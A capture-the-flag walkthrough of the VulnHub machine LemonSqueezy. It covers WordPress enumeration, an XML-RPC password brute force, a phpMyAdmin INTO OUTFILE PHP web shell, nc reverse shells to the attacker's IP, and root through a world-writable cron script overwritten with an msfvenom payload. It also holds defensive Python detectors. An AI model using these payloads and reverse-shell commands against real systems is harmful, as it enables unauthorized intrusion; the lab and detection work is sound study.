INFO

Name : LemonSqueezy

Entry : 26 / 35

Level : Beginner

VulnHub URL : https://www.vulnhub.com/entry/infosec-prep-oscp,508/

GOAL

As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.

SETUP

I’m using both VMware Workstation and VirtualBox (depending on the condition of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network (sometimes Bridged). I used Workstation this time.

DESCRIPTION

This is a beginner boot2root in a similar style to ones I personally enjoy like Mr Robot, Lazysysadmin and MERCY.

This is a VMware machine. DHCP is enabled, add lemonsqueezy to your hosts. It’s easypeasy!

TABLE OF CONTENTS

1. DISCOVERY

2. SCANNING

3. EXPLOITATION

4. POST EXPLOITATION & PRIVILEGE ESCALATION

1. DISCOVERY

2. SCANNING

┌──(root💀takudaddy)-[~]
└─# nmap -A -p- 192.168.20.15                                                                              130 ⨯ 2 ⚙
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-10 00:48 KST
Nmap scan report for 192.168.20.15
Host is up (0.00036s latency).
Not shown: 65534 closed ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Apache2 Debian Default Page: It works

web enumeration

+ Allowed HTTP Methods: HEAD, GET, POST, OPTIONS 
+ Uncommon header 'x-ob_mode' found, with contents: 1
+ OSVDB-3092: /manual/: Web server manual found.
+ OSVDB-3268: /manual/images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ /phpmyadmin/: phpMyAdmin directory found


/icons/               (Status: 403) [Size: 278]
/manual/              (Status: 200) [Size: 626]
/javascript/          (Status: 403) [Size: 278]
/index.html           (Status: 200) [Size: 10701]
/wordpress/           (Status: 200) [Size: 52276]
/phpmyadmin/          (Status: 200) [Size: 10637]
/server-status/       (Status: 403) [Size: 278]

The server is hosting phpMyAdmin and WordPress.

wordpress

The page does not render properly, and none of the links work at all.

Whenever this happened I always assumed it was a server problem and got annoyed every time, but it turns out it happens simply because the host is not registered in the hosts file!

I repent, my ignorant past self~

My apologies to the great developers who provided the server (_ _)

Let's fix it!

Register the IP and hostname in /etc/hosts, then restart the network so it is loaded into memory:

┌──(root💀takudaddy)-[/study]
└─# cat /etc/hosts
127.0.0.1       localhosts
127.0.1.1       takudaddy.example.com   takudaddy
192.168.20.15   lemonsqueezy

Open the page again, and it loads cleanly~~~

wpscan

┌──(root💀takudaddy)-[/study]
└─# wpscan --url http://lemonsqueezy/wordpress -e at -e ap -e u
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://lemonsqueezy/wordpress/ [192.168.20.15]
[+] Started: Sat Apr 10 01:23:58 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://lemonsqueezy/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://lemonsqueezy/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://lemonsqueezy/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://lemonsqueezy/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://lemonsqueezy/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
 |  - http://lemonsqueezy/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-03-09T00:00:00.000Z
 | Readme: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9, Match: 'Version: 1.3'

[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:00 <========================================> (10 / 10) 100.00% Time: 00:00:00

[i] User(s) Identified:

[+] lemon
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://lemonsqueezy/wordpress/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] orange
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Sat Apr 10 01:23:59 2021
[+] Requests Done: 14
[+] Cached Requests: 50
[+] Data Sent: 3.938 KB
[+] Data Received: 11.633 KB
[+] Memory used: 166.551 MB
[+] Elapsed time: 00:00:01

user : lemon / orange

password brute force attack

┌──(root💀takudaddy)-[/study]
└─# wpscan --url http://lemonsqueezy/wordpress --usernames lemon,orange -P /usr/share/wordlists/rockyou.txt       2 ⨯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://lemonsqueezy/wordpress/ [192.168.20.15]
[+] Started: Sat Apr 10 01:50:55 2021

Interesting Finding(s):

[+] Headers
 | Interesting Entry: Server: Apache/2.4.25 (Debian)
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://lemonsqueezy/wordpress/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://lemonsqueezy/wordpress/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://lemonsqueezy/wordpress/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://lemonsqueezy/wordpress/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 4.8.9 identified (Insecure, released on 2019-03-13).
 | Found By: Rss Generator (Passive Detection)
 |  - http://lemonsqueezy/wordpress/index.php/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>
 |  - http://lemonsqueezy/wordpress/index.php/comments/feed/, <generator>https://wordpress.org/?v=4.8.9</generator>

[+] WordPress theme in use: twentyseventeen
 | Location: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/
 | Last Updated: 2021-03-09T00:00:00.000Z
 | Readme: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/README.txt
 | [!] The version is out of date, the latest version is 2.6
 | Style URL: http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9
 | Style Name: Twenty Seventeen
 | Style URI: https://wordpress.org/themes/twentyseventeen/
 | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
 | Author: the WordPress team
 | Author URI: https://wordpress.org/
 |
 | Found By: Css Style In Homepage (Passive Detection)
 |
 | Version: 1.3 (80% confidence)
 | Found By: Style (Passive Detection)
 |  - http://lemonsqueezy/wordpress/wp-content/themes/twentyseventeen/style.css?ver=4.8.9, Match: 'Version: 1.3'

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Passive and Aggressive Methods)
 Checking Config Backups - Time: 00:00:00 <=========================================> (22 / 22) 100.00% Time: 00:00:00

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 2 user/s
[SUCCESS] - orange / ginger

orange : ginger

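Seen from the server side, the password attack above goes through xmlrpc.php, and WordPress answers every wrong guess with HTTP 200 (the failure is a faultCode inside the XML body), so alerting on 401/403 status codes misses it entirely. The following script is an added example, not code from the original post: it parses Apache combined-format access logs and flags clients that send a burst of POST requests to xmlrpc.php within a sliding window. The log lines are constructed; the client addresses and user-agent strings in them are assumptions.

```python
"""Flag XML-RPC password-guessing bursts in Apache access logs (added example)."""
import re
from collections import defaultdict
from datetime import datetime

# Apache "combined" log format; we only need client IP, timestamp, method, path and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FORMAT = "%d/%b/%Y:%H:%M:%S %z"

# Constructed sample log: six rapid POSTs from one host, normal browsing from another.
SAMPLE_LOG = """\
192.168.20.1 - - [10/Apr/2021:01:50:55 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 431 "-" "WPScan v3.8.17"
192.168.20.1 - - [10/Apr/2021:01:50:55 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 431 "-" "WPScan v3.8.17"
192.168.20.1 - - [10/Apr/2021:01:50:56 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 431 "-" "WPScan v3.8.17"
192.168.20.1 - - [10/Apr/2021:01:50:56 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 431 "-" "WPScan v3.8.17"
192.168.20.1 - - [10/Apr/2021:01:50:57 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 431 "-" "WPScan v3.8.17"
192.168.20.1 - - [10/Apr/2021:01:50:57 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 431 "-" "WPScan v3.8.17"
192.168.20.77 - - [10/Apr/2021:01:51:02 +0900] "GET /wordpress/ HTTP/1.1" 200 52276 "-" "Mozilla/5.0"
192.168.20.77 - - [10/Apr/2021:01:51:40 +0900] "POST /wordpress/xmlrpc.php HTTP/1.1" 200 431 "-" "Jetpack"
"""


def parse_line(line):
    """Return (ip, timestamp, method, path) for a combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), TS_FORMAT)
    return m.group("ip"), ts, m.group("method"), m.group("path")


def find_xmlrpc_bursts(log_text, threshold=5, window_seconds=60):
    """Map client IP -> peak number of xmlrpc.php POSTs seen inside any window of window_seconds.

    Only IPs whose peak reaches `threshold` are returned. Status codes are deliberately
    ignored: a failed XML-RPC login is still an HTTP 200.
    """
    hits = defaultdict(list)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ip, ts, method, path = rec
        if method == "POST" and path.split("?")[0].endswith("/xmlrpc.php"):
            hits[ip].append(ts)

    bursts = {}
    for ip, stamps in hits.items():
        stamps.sort()
        start = 0
        peak = 0
        # Two-pointer sliding window over the sorted timestamps.
        for end, ts in enumerate(stamps):
            while (ts - stamps[start]).total_seconds() > window_seconds:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            bursts[ip] = peak
    return bursts


if __name__ == "__main__":
    for ip, count in find_xmlrpc_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {count} xmlrpc.php POSTs within 60s")
```

Count requests rather than login failures: the XML-RPC interface also exposes system.multicall, which can bundle several guesses into one request, so the request threshold should stay low. If XML-RPC is not needed by a mobile client or Jetpack, disabling it at the web server removes the attack surface outright.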
3. EXPLOITATION

n0t1n@w0rdl1st!

phpmyadmin

orange : n0t1n@w0rdl1st!

 

 

lemon :

$P$ByDvlux0J/6CvT2nU20bxqp/5mDxc00

create new table

SELECT "<?php system($_GET['cmd']); ?>" into outfile "/var/www/html/wordpress/backdoor.php"

After starting the listener:

cmd = nc -e /bin/bash 192.168.20.1 7979

┌──(root💀takudaddy)-[/study]
└─# nc -lvp 7979          
listening on [any] 7979 ...
connect to [192.168.20.1] from lemonsqueezy [192.168.20.15] 58512
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
python -c 'import pty;pty.spawn("/bin/bash")'
www-data@lemonsqueezy:/var/www/html/wordpress$ 

Initial access successful.

 

 

4. POST EXPLOITATION & PRIVILEGE ESCALATION

 

www-data@lemonsqueezy:/opt$ find / -perm -g=s -type f -exec ls -l {} \; 2>/dev/null
< / -perm -g=s -type f -exec ls -l {} \; 2>/dev/null
-rwxr-sr-x 1 root shadow 35592 May 28  2017 /sbin/unix_chkpwd
-rwxr-sr-x 1 root tty 14768 Apr 12  2017 /usr/bin/bsd-write
-rwxr-sr-x 1 root mail 19008 Jan 17  2017 /usr/bin/dotlockfile
-rwxr-sr-x 1 root shadow 22808 Mar 17 18:57 /usr/bin/expiry
-rwxr-sr-x 1 root shadow 71856 Mar 17 18:57 /usr/bin/chage
-rwxr-sr-x 1 root crontab 40264 Oct  7  2017 /usr/bin/crontab
-rwxr-sr-x 1 root tty 27448 Mar  8  2018 /usr/bin/wall
-rwxr-sr-x 1 root ssh 358624 Jul 15  2019 /usr/bin/ssh-agent
-rwxr-sr-x 1 root utmp 10232 Feb 19  2016 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root mail 14336 Aug  3  2020 /usr/lib/evolution/camel-lock-helper-1.2
-rwsr-sr-x 1 root root 10576 Dec  2 21:01 /usr/lib/xorg/Xorg.wrap
www-data@lemonsqueezy:/opt$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 *   * * *   root    /etc/logrotate.d/logrotate
#
www-data@lemonsqueezy:/opt$

www-data@lemonsqueezy:/opt$ ls -l /etc/logrotate.d/logrotate
ls -l /etc/logrotate.d/logrotate
-rwxrwxrwx 1 root root 101 Apr 26  2020 /etc/logrotate.d/logrotate
www-data@lemonsqueezy:/opt$ cat /etc/logrotate.d/logrotate
cat /etc/logrotate.d/logrotate
#!/usr/bin/env python
import os
import sys
try:
   os.system('rm -r /tmp/* ')
except:
    sys.exit()
www-data@lemonsqueezy:/opt$ 

 

 

The /etc/logrotate.d/logrotate file is executed as root every two minutes, and we also have permission to modify it.

A FIFO is used. Generating the payload prints the command that has to be entered on the target server:

┌──(root💀takudaddy)-[/attack]
└─# msfvenom -p cmd/unix/reverse_netcat LHOST=192.168.20.1 LPORT=7777                                      130 ⨯ 2 ⚙
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 98 bytes
mkfifo /tmp/xradgd; nc 192.168.20.1 7777 0</tmp/xradgd | /bin/sh >/tmp/xradgd 2>&1; rm /tmp/xradgd

Replace the contents of the logrotate file on the target with this:

www-data@lemonsqueezy:/etc/logrotate.d$ echo "mkfifo /tmp/xradgd; nc 192.168.20.1 7777 0</tmp/xradgd | /bin/sh >/tmp/xradgd 2>&1; rm /tmp/xradgd
</xradgd | /bin/sh >/tmp/xradgd 2>&1; rm /tmp/xradgd
>" > logrotate

www-data@lemonsqueezy:/etc/logrotate.d$ cat logrotate
cat logrotate
mkfifo /tmp/xradgd; nc 192.168.20.1 7777 0</tmp/xradgd | /bin/sh >/tmp/xradgd 2>&1; rm /tmp/xradgd

Start the listener and wait:

┌──(root💀takudaddy)-[/attack]
└─# nc -lvp 7777                                                                                                 2 ⚙
listening on [any] 7777 ...
connect to [192.168.20.1] from lemonsqueezy [192.168.20.15] 38766
id
uid=0(root) gid=0(root) groups=0(root)
python -c 'import pty;pty.spawn("/bin/bash")'
root@lemonsqueezy:~# cd /root
cd /root
root@lemonsqueezy:~# ls
ls
root.txt
root@lemonsqueezy:~# cat root.txt
cat root.txt
NvbWV0aW1lcyBhZ2FpbnN0IHlvdXIgd2lsbC4=
root@lemonsqueezy:~# 
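The escalation worked because a root cron job ran a world-writable script. The following is an added example, not code from the post, that audits /etc/crontab-style entries for exactly that condition: it parses each line, collects the absolute paths in every root job's command, and reports any path that a non-root user can write to. The crontab text and the file modes are constructed so the check runs offline; calling `audit_crontab` with the default `real_mode` lookup audits the live host instead.

```python
"""Audit system crontab entries for root jobs whose script others can write (added example)."""
import os
import re
import shlex
import stat

# System crontab line: five time fields (or an @keyword), then the user, then the command.
CRON_LINE = re.compile(
    r'^(\S+\s+\S+\s+\S+\s+\S+\s+\S+|@\w+)\s+(?P<user>\S+)\s+(?P<cmd>.+)$')

# Constructed crontab modelled on the one found on the box.
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
*/2 *   * * *   root    /etc/logrotate.d/logrotate
0 3     * * *   backup  /usr/local/bin/backup.sh --full
"""

# Constructed stand-in for os.stat(): path -> (permission bits, owner uid).
SAMPLE_MODES = {
    "/etc/logrotate.d/logrotate": (0o777, 0),
    "/usr/local/bin/backup.sh": (0o755, 0),
}


def real_mode(path):
    """Permission bits and owner uid of a real path, or None if it does not exist."""
    try:
        st = os.stat(path)
    except OSError:
        return None
    return stat.S_IMODE(st.st_mode), st.st_uid


def command_paths(cmd):
    """Absolute paths mentioned anywhere in a crontab command, including after && or ;."""
    try:
        tokens = shlex.split(cmd)
    except ValueError:  # unbalanced quotes: fall back to whitespace splitting
        tokens = cmd.split()
    return [t for t in tokens if t.startswith("/")]


def audit_crontab(text, mode_lookup=real_mode):
    """Return (user, path, reason) for every root job that touches a non-root-writable path."""
    findings = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue  # blank, comment, or VAR=value line
        m = CRON_LINE.match(line)
        if not m or m.group("user") != "root":
            continue
        for path in command_paths(m.group("cmd")):
            info = mode_lookup(path)
            if info is None:
                continue
            mode, uid = info
            if mode & stat.S_IWOTH:
                findings.append(("root", path, "world-writable"))
            elif mode & stat.S_IWGRP:
                findings.append(("root", path, "group-writable"))
            elif uid != 0:
                findings.append(("root", path, "owned by uid %d" % uid))
    return findings


if __name__ == "__main__":
    for user, path, reason in audit_crontab(SAMPLE_CRONTAB, SAMPLE_MODES.get):
        print(f"{user} job runs {path}: {reason}")
```

The check looks only at the script itself; a writable parent directory (here /etc/logrotate.d) lets the file be replaced just as easily, so a full audit also walks each path's ancestors. The fix on a real host is the usual one: scripts run by root are owned by root with mode 0755 or tighter, and /etc/cron.d and /etc/crontab are watched by file-integrity monitoring.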

 

 
